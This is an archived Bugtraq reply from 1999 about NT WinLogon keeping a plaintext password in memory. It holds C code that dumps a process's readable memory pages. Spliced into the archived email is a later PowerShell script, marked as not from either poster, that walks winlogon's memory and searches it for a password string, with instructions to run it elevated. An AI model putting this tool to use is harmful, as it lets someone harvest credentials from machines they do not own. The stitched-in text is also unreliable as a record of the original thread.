Re: NT WinLogon VM contains plaintext password visible in admin mode

From: Robert Horvick (rhorvickat_private)
Date: Thu Dec 16 1999 - 11:11:21 PST


    Actually there is a large bug in the code (well - it works just as well, but
    thousands of times faster and is more correct):
    
    There is no reason to look beyond the application min and max address range,
    and no reason to read in anything other than page sizes (since a
    VirtualAlloc will always round to at least the next largest page size).
    This was how I should have written it to begin with, but I got lazy :)
    
    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    
    /* Dump every readable page of hProc to szPath. hProc must have been
       opened with at least PROCESS_VM_READ. Contiguous readable pages are
       written back to back; each new run of readable pages is preceded by
       an "offset" header giving its starting address. Returns the number
       of bytes dumped. */
    DWORD DumpMemory(HANDLE hProc, LPSTR szPath)
    {
        LPSTR  lpOffset = 0;
        LPSTR  lpBuf = 0;
        SIZE_T dwRead = 0;
        BOOL   bLastRead = FALSE;
        DWORD  dwDumpedBytes = 0;
        SYSTEM_INFO si = {0};
        FILE *f = 0;
    
        f = fopen(szPath, "wb");
        if(f)
        {
            GetSystemInfo(&si);
            lpBuf = (LPSTR)malloc(si.dwPageSize);
            if(!lpBuf)
            {
                fclose(f);
                return 0;
            }
            /* Probe one page at a time across the user address range. The
               for-loop increment is the only place lpOffset advances, so no
               page is skipped. */
            for(lpOffset = (LPSTR)si.lpMinimumApplicationAddress;
                (void*)lpOffset <= si.lpMaximumApplicationAddress;
                lpOffset += si.dwPageSize)
            {
                if(ReadProcessMemory( hProc,
                    lpOffset,
                    lpBuf,
                    si.dwPageSize,
                    &dwRead))
                {
                    if(!bLastRead)
                    {
                        /* First readable page after a gap: record where it starts. */
                        fprintf(f, "\noffset %p\n", (void*)lpOffset);
                        bLastRead = TRUE;
                    }
                    fwrite(lpBuf, 1, dwRead, f);
                    dwDumpedBytes += (DWORD)dwRead;
                }
                else
                {
                    bLastRead = FALSE;
                }
            }
            free(lpBuf);
            fclose(f);
        }
        else
        {
            fprintf(stderr, "Unable to open %s\n", szPath);
        }
    
        return dwDumpedBytes;
    }
    
    -----Original Message-----
    From: Jorge_Miguel_Pintoat_private
    [mailto:Jorge_Miguel_Pintoat_private]
    Sent: Thursday, December 16, 1999 9:48 AM
    To: rhorvickat_private
    Cc: BUGTRAQat_private
    Subject: RE: NT WinLogon VM contains plaintext password visible in admin mode
    
    
    I am sorry, but I only read this today...
    There is a small bug in this code...
    
     <!     LPSTR   lpOffset = (void*)1;
     !>     LPSTR   lpOffset = (LPSTR)1;
    
    This also doesn't work on Windows 2000 Professional, SRV and Adv Srv.
    
    Greetings,
    
    J.
    
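The page-by-page probe above still issues one ReadProcessMemory call per page of the whole user range. The following is an added example, not code from either poster: it asks the kernel for the region map with VirtualQueryEx, reads only committed regions that are not PAGE_NOACCESS or PAGE_GUARD, and searches each region for a string in both ANSI and UTF-16LE (the form NT's Unicode APIs keep strings in), which is what you would actually do with such a dump when looking for a plaintext password. The target name (winlogon), the needle, and the chunk size are assumptions for the demonstration; it must be run from an elevated PowerShell of the same bitness as the target, and what (if anything) it finds depends on the Windows version, as the thread already notes.

```powershell
# Added example (not from the original post): search a process's memory for a
# string by walking committed, readable regions with VirtualQueryEx instead of
# probing every page. Target, needle and chunk size are assumed demo values.
param(
    [string]$ProcessName = 'winlogon',   # assumed target, as in the thread
    [string]$Needle      = 'Password1'   # assumed plaintext to look for
)

if (-not ('Win32.Mem' -as [type])) {
    Add-Type -Namespace Win32 -Name Mem -MemberDefinition @'
[StructLayout(LayoutKind.Sequential)]
public struct MEMORY_BASIC_INFORMATION {
    public IntPtr BaseAddress; public IntPtr AllocationBase; public uint AllocationProtect;
    public IntPtr RegionSize;  public uint State; public uint Protect; public uint Type;
}
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, IntPtr dwLength);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, IntPtr nSize, out IntPtr lpNumberOfBytesRead);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
'@
}

$PROCESS_QUERY_INFORMATION = 0x0400; $PROCESS_VM_READ = 0x0010
$MEM_COMMIT = 0x1000; $PAGE_NOACCESS = 0x01; $PAGE_GUARD = 0x100

# Latin-1 maps every byte to exactly one char, so .NET's ordinal IndexOf gives
# a fast byte-exact search. Prepare the needle as ANSI and as UTF-16LE.
$latin1   = [System.Text.Encoding]::GetEncoding(28591)
$patterns = @{
    'ANSI'     = $latin1.GetString([System.Text.Encoding]::ASCII.GetBytes($Needle))
    'UTF-16LE' = $latin1.GetString([System.Text.Encoding]::Unicode.GetBytes($Needle))
}
$maxPat = $patterns['UTF-16LE'].Length

try { [System.Diagnostics.Process]::EnterDebugMode() } catch { }   # enable SeDebugPrivilege if the token holds it
$proc = Get-Process -Name $ProcessName -ErrorAction Stop | Select-Object -First 1
$h = [Win32.Mem]::OpenProcess([uint32]($PROCESS_QUERY_INFORMATION -bor $PROCESS_VM_READ), $false, [uint32]$proc.Id)
if ($h -eq [IntPtr]::Zero) {
    $err = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
    throw "OpenProcess on PID $($proc.Id) failed: $((New-Object System.ComponentModel.Win32Exception $err).Message)"
}

$hits  = New-Object System.Collections.Generic.List[object]
$mbi   = New-Object 'Win32.Mem+MEMORY_BASIC_INFORMATION'
$mbiSz = [IntPtr][System.Runtime.InteropServices.Marshal]::SizeOf($mbi)
$chunk = [UInt64]1MB      # read large regions in pieces rather than in one allocation
$addr  = [UInt64]0
try {
    # VirtualQueryEx fails once $addr passes the last user-mode region, ending the walk.
    while ([Win32.Mem]::VirtualQueryEx($h, [IntPtr][Int64]$addr, [ref]$mbi, $mbiSz).ToInt64() -ne 0) {
        $base = [UInt64]$mbi.BaseAddress.ToInt64()
        $size = [UInt64]$mbi.RegionSize.ToInt64()
        $readable = ($mbi.State -eq $MEM_COMMIT) -and
                    (($mbi.Protect -band ($PAGE_NOACCESS -bor $PAGE_GUARD)) -eq 0)
        if ($readable) {
            # $carry keeps the tail of the previous chunk so a match straddling a chunk
            # boundary is still found; it is reset per region, so a string that straddles
            # two adjacent regions is not reported.
            $carry = ''
            for ($off = [UInt64]0; $off -lt $size; $off += $chunk) {
                $want = [Math]::Min($chunk, $size - $off)
                $buf  = New-Object byte[] ([int]$want)
                $got  = [IntPtr]::Zero
                $ok = [Win32.Mem]::ReadProcessMemory($h, [IntPtr][Int64]($base + $off),
                                                     $buf, [IntPtr][Int64]$want, [ref]$got)
                if (-not $ok) { break }
                $text = $carry + $latin1.GetString($buf, 0, [int]$got.ToInt64())
                foreach ($enc in $patterns.Keys) {
                    $pat = $patterns[$enc]
                    $pos = $text.IndexOf($pat, [StringComparison]::Ordinal)
                    while ($pos -ge 0) {
                        # a match lying wholly inside the carried tail was already reported
                        if ($pos + $pat.Length -gt $carry.Length) {
                            $hits.Add([pscustomobject]@{
                                Address  = '0x{0:X}' -f ($base + $off - [UInt64]$carry.Length + [UInt64]$pos)
                                Encoding = $enc
                            })
                        }
                        $pos = $text.IndexOf($pat, $pos + 1, [StringComparison]::Ordinal)
                    }
                }
                $carry = $text.Substring([Math]::Max(0, $text.Length - ($maxPat - 1)))
            }
        }
        $addr = $base + $size
    }
} finally { [void][Win32.Mem]::CloseHandle($h) }

"{0} hit(s) for '{1}' in {2} (PID {3})" -f $hits.Count, $Needle, $proc.ProcessName, $proc.Id
$hits | Format-Table -AutoSize
```

Save it under any name (the file name is your choice) and run it from an elevated PowerShell, for example `.\Find-ProcessString.ps1 -ProcessName winlogon -Needle 'secret'`. The region walk is the point: VirtualQueryEx returns the boundaries and protection of each allocation, so reserved-but-uncommitted space is skipped outright instead of being probed one page at a time, and guard pages are never touched.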
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:21:50 PDT